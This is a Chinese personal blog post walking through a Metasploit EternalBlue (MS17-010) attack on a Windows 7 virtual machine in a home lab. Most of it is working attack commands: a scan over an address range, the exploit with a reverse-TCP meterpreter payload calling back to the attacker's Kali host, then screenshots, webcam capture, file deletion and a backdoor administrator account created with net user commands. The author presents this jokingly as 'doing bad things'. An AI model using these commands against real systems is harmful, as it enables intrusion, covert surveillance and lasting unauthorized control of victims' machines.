MSF-永恒之蓝入侵

Welcome to Shmily-ing’blog!

实验场景

渗透机kali ip:192.168.119.138

靶机 win7-2 ip:192.168.119.132

子网掩码:255.255.255.0

测试能否ping通

image-20200926193858120

image-20200926193926874

ok 可以


  • kali打开 msfconsole

image-20200926194608129

  • 输入search ms17_010

image-20200926195212894

auxiliary/scanner/smb/smb_ms17_010 为扫描模板

exploit/windows/smb/ms17_010_eternalblue为攻击模板

扫描是否存在该漏洞

ues auxiliary/scanner/smb/smb_ms17_010 #使用模块

optipons #查看我们需要的设置

set rhosts 192.168.119.1-137 #设置目标ip范围

set threads 20 #设置线程,加快扫描

run

image-20200926201345760

我们可以发现存在漏洞的地方


运用攻击模块

use exploit/windows/smb/ms17_010_eternalblue

set rhosts 192.168.119.132

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.119.138

exploit

image-20200926205215563

image-20200926205307084

成功监听了。


干点坏事了~_ ~嘿嘿

sysinfo 显示远程主机系统信息

getuid 查看用户身份

screenshot 对远程主机当前屏幕进行截图

image-20200926210803367

image-20200926211000376

webcam_list 查看有没有摄像头 ,webcam_stream 打开摄像头。虚拟机一般情况下没有摄像头,除非自己设置

webcam_snap 拍照

shell 进入控制台 如果出现中文乱码 : chcp 65001解决shell后中文乱码问题

后面删文件(del ),写文件(echo 内容> 1.txt)都可以 //dos 命令


留后门

net user shmily-ing 111111 /add 创建shmily-ing用户

net localgroup administrators shmily-ing /add 提权


EternalBlue-分析

参考博客

  • Copyrights © 2020-2023 Shmily-ing
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信